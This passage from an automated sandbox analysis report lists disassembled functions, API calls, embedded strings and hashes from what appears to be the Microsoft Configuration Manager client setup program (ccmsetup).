                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\smsutil.cpp$..\smsutil.cpp$..\smsutil.cpp$..\smsutil.cpp$..\smsutil.cpp$..\smsutil.cpp$..\smsutil.cpp$..\smsutil.cpp$ClientVersion$SMS::Utility::GetClientVersionFromWMI$root\ccm$select ClientVersion from SMS_Client$spEnum.Next (&spObj)$spNS.Open(L"root\\ccm")$spNS.Query(L"select ClientVersion from SMS_Client", &spEnum)$spObj.GetString (L"ClientVersion", sClientVersion)
                                                                                          • API String ID: 2734623419-1706065210
                                                                                          • Opcode ID: 405671867754e5315a62434f78e99a338d6bd05643f2252f2f1fc9bd03bc4613
                                                                                          • Instruction ID: af4dd4bf7d920ab4ae642c5303c0e887191b7555bfaa7d51253bb7e0ded67230
                                                                                          • Opcode Fuzzy Hash: 405671867754e5315a62434f78e99a338d6bd05643f2252f2f1fc9bd03bc4613
                                                                                          • Instruction Fuzzy Hash: 2851C570945298AADB25EBA0CD1AEFEBF75AF92B10F144149F501773C2CB782A06C791
                                                                                          Function 00622D2A Relevance: 42.2, APIs: 5, Strings: 19, Instructions: 234threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00622D31
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00622DAE
                                                                                            • Part of subcall function 00623D45: __EH_prolog3_catch.LIBCMT ref: 00623D4C
                                                                                            • Part of subcall function 00623034: __EH_prolog3_catch_GS.LIBCMT ref: 0062303E
                                                                                            • Part of subcall function 00623034: GetCurrentThreadId.KERNEL32 ref: 006230F5
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00622E1D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00622E6F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00622F97
                                                                                          Strings
                                                                                          • ..\CcmCert.cpp, xrefs: 00622D9E
                                                                                          • ..\CcmCert.cpp, xrefs: 00622E77
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00622E18
                                                                                          • 0 != ppCertContext, xrefs: 00622DA4
                                                                                          • , xrefs: 00622EFF
                                                                                          • ..\CcmCert.cpp, xrefs: 00622F87
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00622DA9
                                                                                          • CcmUtilLib::CcmGetCertificateContextEx1, xrefs: 00622D68
                                                                                          • ..\CcmCert.cpp, xrefs: 00622F9F
                                                                                          • CcmGetCertificateStoreName ( sCertStore ), xrefs: 00622E13
                                                                                          • CcmGetCertificateIssuers ( sCertIssuers ), xrefs: 00622E65
                                                                                          • ..\CcmCert.cpp, xrefs: 00622E0D
                                                                                          • ..\CcmCert.cpp, xrefs: 00622DB6
                                                                                          • $H|, xrefs: 00622ECB
                                                                                          • ..\CcmCert.cpp, xrefs: 00622E25
                                                                                          • ..\CcmCert.cpp, xrefs: 00622E5F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00622F92
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00622E6A
                                                                                          • CcmGetCertificateContextEx2( sCertStore, sCertIssuers, sCertSel, (BOOL)dwCertFirstFlag, 0x00000001 | 0x00000002 | 0x00000008, ppCe, xrefs: 00622F8D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$H_prolog3H_prolog3_catch
                                                                                          • String ID: $$H|$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$0 != ppCertContext$CcmGetCertificateContextEx2( sCertStore, sCertIssuers, sCertSel, (BOOL)dwCertFirstFlag, 0x00000001 | 0x00000002 | 0x00000008, ppCe$CcmGetCertificateIssuers ( sCertIssuers )$CcmGetCertificateStoreName ( sCertStore )$CcmUtilLib::CcmGetCertificateContextEx1
                                                                                          • API String ID: 3423034556-740011273
                                                                                          • Opcode ID: 13292a64d374fa5bb21250c3ae10a149c82ed6d9aad8dab98bc35c58cf4f8892
                                                                                          • Instruction ID: fa7c3be447fc0900aceff13c703f8a412e51b6b354d4eb7817504c8b43903663
                                                                                          • Opcode Fuzzy Hash: 13292a64d374fa5bb21250c3ae10a149c82ed6d9aad8dab98bc35c58cf4f8892
                                                                                          • Instruction Fuzzy Hash: 5681FFB1C0066AAACF10EBE4DD59EEEBB7AAF54710F10851DF511BB2C2D7346A05CB20
                                                                                          Function 005945C4 Relevance: 40.6, APIs: 3, Strings: 20, Instructions: 365threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005A1CAB: __EH_prolog3_GS.LIBCMT ref: 005A1CB2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005947C4
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeH_prolog3_LocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$.log$=$AADCLIENTAPPID$AADRESOURCEURI$AppendAutoUpgradeInfo()$LoadConfigFile()$Logs\$No valid source or MP locations$Pp\$SslState value: %lu$_uninstall.log$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$client.msi$;!$Fl
                                                                                          • API String ID: 154734393-94057155
                                                                                          • Opcode ID: 509651ffd3094d405c760d6fe4b12eb04cdf0dba1a434ee5262d5e1c9415c3d9
                                                                                          • Instruction ID: e253895ab8da794d5d4b4cd55e8b84c9fef23eb13ff94d9c437a1704c172b1cf
                                                                                          • Opcode Fuzzy Hash: 509651ffd3094d405c760d6fe4b12eb04cdf0dba1a434ee5262d5e1c9415c3d9
                                                                                          • Instruction Fuzzy Hash: 15F18E30944359EAEF25EBA0CD5EBDEBBB4AB22304F1444D9E2456B182CBB41F48DF51
                                                                                          Function 005A162C Relevance: 40.5, APIs: 12, Strings: 11, Instructions: 204stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_GS.LIBCMT ref: 005A1633
                                                                                          • lstrcmpiW.KERNEL32(?,CCMHTTPPORT,00000001,00000000,?,?,00000001,?), ref: 005A176B
                                                                                          • lstrcmpiW.KERNEL32(?,CCMHTTPSPORT), ref: 005A178B
                                                                                          • lstrcmpiW.KERNEL32(?,CCMHTTPSSTATE), ref: 005A17AB
                                                                                          • lstrcmpiW.KERNEL32(?,CCMCERTSTORE), ref: 005A17C6
                                                                                          • lstrcmpiW.KERNEL32(?,CCMCERTISSUERS), ref: 005A17DA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcmpi$H_prolog3_
                                                                                          • String ID: AADCLIENTAPPID$AADRESOURCEURI$CCMCERTISSUERS$CCMCERTSEL$CCMCERTSTORE$CCMFIRSTCERT$CCMHTTPPORT$CCMHTTPSPORT$CCMHTTPSSTATE$CCMPKICERTOPTIONS$smspublicrootkey
                                                                                          • API String ID: 534044287-981794382
                                                                                          • Opcode ID: 7cd4c2d5f5499459ea5e76937e3779abf04c01db043c9e7821cec36fd5d92a7b
                                                                                          • Instruction ID: 58491c3aa60e96860e80992be2a6eadd547c9a3f82e881e01ec36e499ae519ee
                                                                                          • Opcode Fuzzy Hash: 7cd4c2d5f5499459ea5e76937e3779abf04c01db043c9e7821cec36fd5d92a7b
                                                                                          • Instruction Fuzzy Hash: 3271B130A0060ADACF14EFA0C891EFD7FB5FF56750F541029E902BB186EB249942CBB4
                                                                                          Function 00602D53 Relevance: 38.7, APIs: 5, Strings: 17, Instructions: 204threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00602D5A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00602DB4
                                                                                            • Part of subcall function 006092A8: __EH_prolog3.LIBCMT ref: 006092AF
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00602E0E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00602EF2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00602FDD
                                                                                          Strings
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00602EE2
                                                                                          • null() == false, xrefs: 00602DAA
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00602E16
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00602FD8
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00602DFE
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00602E09
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00602DA4
                                                                                          • ppObject != 0, xrefs: 00602E04
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00602FCD
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00602FE5
                                                                                          • getPointer()->GetObject( (pszObjectPath != NULL) ? BString(pszObjectPath) : (BSTR)NULL, WBEM_FLAG_RETURN_WBEM_COMPLETE, pContext, , xrefs: 00602FD3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00602DAF
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00602EED
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00602DBC
                                                                                          • pThis->CheckConnection(), xrefs: 00602EE8
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00602EFA
                                                                                          • CCM::Utility::Wmi::Namespace::Get, xrefs: 00602D6D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$CCM::Utility::Wmi::Namespace::Get$getPointer()->GetObject( (pszObjectPath != NULL) ? BString(pszObjectPath) : (BSTR)NULL, WBEM_FLAG_RETURN_WBEM_COMPLETE, pContext, $null() == false$pThis->CheckConnection()$ppObject != 0
                                                                                          • API String ID: 981364226-4056929528
                                                                                          • Opcode ID: 43fb094074059aaa0974fbdde2b910f6b9649f8f52b1a0bb9fa9ad2f342b979d
                                                                                          • Instruction ID: b81160ad772772b3c0977e41b499772337933db2dbc497c0766ba942ef425b12
                                                                                          • Opcode Fuzzy Hash: 43fb094074059aaa0974fbdde2b910f6b9649f8f52b1a0bb9fa9ad2f342b979d
                                                                                          • Instruction Fuzzy Hash: 687103B1AC0206AFDB18DF94CC5ABEEBE72AF44714F248019F5146B2D2C7784E41CB91
                                                                                          Function 0057F21C Relevance: 37.2, APIs: 1, Strings: 20, Instructions: 466threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                            • Part of subcall function 005F4099: __EH_prolog3.LIBCMT ref: 005F40A0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057F682
                                                                                            • Part of subcall function 005F4253: __EH_prolog3.LIBCMT ref: 005F425A
                                                                                          Strings
                                                                                          • No MP or source location has been explicitly specified. Trying to discover a valid content location..., xrefs: 0057F519
                                                                                          • GetDefaultSourceLocation( sSource ), xrefs: 0057F678
                                                                                          • Found last valid MP '%s'., xrefs: 0057F2FD
                                                                                          • /source:, xrefs: 0057F7F6
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057F67D
                                                                                          • No valid source or MP locations, xrefs: 0057F873
                                                                                          • ccmsetup.cpp, xrefs: 0057F68A
                                                                                          • MP '%s' is HTTPS. Client does not allow to use PKI issued cert and is not AAD capable. Ignoring this MP., xrefs: 0057F45B
                                                                                          • x$k, xrefs: 0057F505
                                                                                          • |8k, xrefs: 0057F77A
                                                                                          • Looking for MPs from AD..., xrefs: 0057F561
                                                                                          • Ccmsetup run in remediation mode. Adding MPs from the client as backup., xrefs: 0057F26B
                                                                                          • ccmsetup.cab, xrefs: 0057F6F5
                                                                                          • Current directory '%s' is a valid source location., xrefs: 0057F78F
                                                                                          • Ccmsetup runs in standalone mode, save current directory for future remediation usage., xrefs: 0057F7DA
                                                                                          • ccmsetup.cpp, xrefs: 0057F672
                                                                                          • SMSSITECODE, xrefs: 0057F571
                                                                                          • Couldn't find an MP source through AD. Error 0x%x, xrefs: 0057F5C9
                                                                                          • Current directory '%s' is not a valid source location., xrefs: 0057F832
                                                                                          • k, xrefs: 0057F257
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3Thread
                                                                                          • String ID: k$%s, HRESULT=%08lx (%s,%lu)$/source:$Ccmsetup run in remediation mode. Adding MPs from the client as backup.$Ccmsetup runs in standalone mode, save current directory for future remediation usage.$Couldn't find an MP source through AD. Error 0x%x$Current directory '%s' is a valid source location.$Current directory '%s' is not a valid source location.$Found last valid MP '%s'.$GetDefaultSourceLocation( sSource )$Looking for MPs from AD...$MP '%s' is HTTPS. Client does not allow to use PKI issued cert and is not AAD capable. Ignoring this MP.$No MP or source location has been explicitly specified. Trying to discover a valid content location...$No valid source or MP locations$SMSSITECODE$ccmsetup.cab$ccmsetup.cpp$ccmsetup.cpp$x$k$|8k
                                                                                          • API String ID: 2223909941-3299787160
                                                                                          • Opcode ID: 5784fa7d588f334ff733ff54450abae0cccb7d81cf6fc409c3bdbaeb47e877a3
                                                                                          • Instruction ID: 4787eb3fa82fd9dd262f14e7710c9e0c15e6e4d9f87f27b5bee06bffac013d2b
                                                                                          • Opcode Fuzzy Hash: 5784fa7d588f334ff733ff54450abae0cccb7d81cf6fc409c3bdbaeb47e877a3
                                                                                          • Instruction Fuzzy Hash: F312B171D00219EEDF10DFA4D989BEDBFB5BF54304F1080A9E548A7282DBB45A88DF61
                                                                                          Function 005F2D38 Relevance: 36.9, APIs: 5, Strings: 16, Instructions: 107threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005F2D3F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F2D7F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F2DCC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F2E09
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F2E6C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$RefreshConfiguration()$pLogHandler != 0$pLogHandler->pLogProc != 0$pLogHandler->uSize == sizeof(CcmLogHandlerInfo)
                                                                                          • API String ID: 3454896115-3937812083
                                                                                          • Opcode ID: 7a17c345f5d42f868d8cd2a88f7d94eee1874b3c9a4c01594bd35afc6250d062
                                                                                          • Instruction ID: cac0a8b75c1d42cbfebaa9cceaba228944acb07a2bf1546a3172674f126d2749
                                                                                          • Opcode Fuzzy Hash: 7a17c345f5d42f868d8cd2a88f7d94eee1874b3c9a4c01594bd35afc6250d062
                                                                                          • Instruction Fuzzy Hash: 45311EF1984249FAD722DB988C0AFFB3EA9BB95B14F144019F545EB2C1C6BD4E81C790
                                                                                          Function 00603DF4 Relevance: 35.2, APIs: 4, Strings: 16, Instructions: 156threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00603DFB
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603E72
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603EE1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603F30
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$CCM::Utility::Wmi::Namespace::SetNamespacePath$Get(L"__SystemClass", &spObject)$\\%s\%s$__SERVER$__SystemClass$null() == false$spObject.GetString(L"__SERVER", sServer)
                                                                                          • API String ID: 2734623419-4121369068
                                                                                          • Opcode ID: 0c4c09efad65ed24cf9cf2a08b543cf19629edcb8a685676894616446c2a3438
                                                                                          • Instruction ID: 86cd2acd14d57d0a5b154dabe16d80a2f5d9f96f0846599a0eba1fff3431ba2d
                                                                                          • Opcode Fuzzy Hash: 0c4c09efad65ed24cf9cf2a08b543cf19629edcb8a685676894616446c2a3438
                                                                                          • Instruction Fuzzy Hash: 4E5101B0D80259EADB14EBA4CD0AFEEBF79AF51700F14405AF1056B2C2DBB81B05CB61
                                                                                          Function 00607FC3 Relevance: 35.1, APIs: 7, Strings: 13, Instructions: 105threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00607FCA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060802A
                                                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,00000000,00000000), ref: 00608060
                                                                                          • GetLastError.KERNEL32(00000000,00000001,00000000,00000000,CCM::Utility::Filesystem::Path::CreateEx,00000020,005817C1,?,O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY),?), ref: 00608069
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060809F
                                                                                          • LocalFree.KERNEL32(00000000,?,0000000C,00000000,00000001,00000000,00000000,CCM::Utility::Filesystem::Path::CreateEx,00000020,005817C1,?,O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY),?), ref: 0060812F
                                                                                            • Part of subcall function 00607BCA: __EH_prolog3_catch_GS.LIBCMT ref: 00607BD4
                                                                                            • Part of subcall function 00607BCA: PathIsRelativeW.SHLWAPI(?,CCM::Utility::Filesystem::Path::Create), ref: 00607C44
                                                                                            • Part of subcall function 00607BCA: GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00607C97
                                                                                            • Part of subcall function 00607BCA: GetLastError.KERNEL32 ref: 00607CA1
                                                                                            • Part of subcall function 00607BCA: GetCurrentThreadId.KERNEL32 ref: 00607CDE
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006080FE
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006080F9
                                                                                          • ..\path.cpp, xrefs: 0060801A
                                                                                          • ..\path.cpp, xrefs: 00608106
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060809A
                                                                                          • Path::Create(szPath, 0), xrefs: 00608020
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00608025
                                                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorW(szPermissions, 1, &psd, 0 ), xrefs: 00608095
                                                                                          • Path::Create(szPath, &sa), xrefs: 006080F4
                                                                                          • CCM::Utility::Filesystem::Path::CreateEx, xrefs: 00607FD7
                                                                                          • ..\path.cpp, xrefs: 0060808F
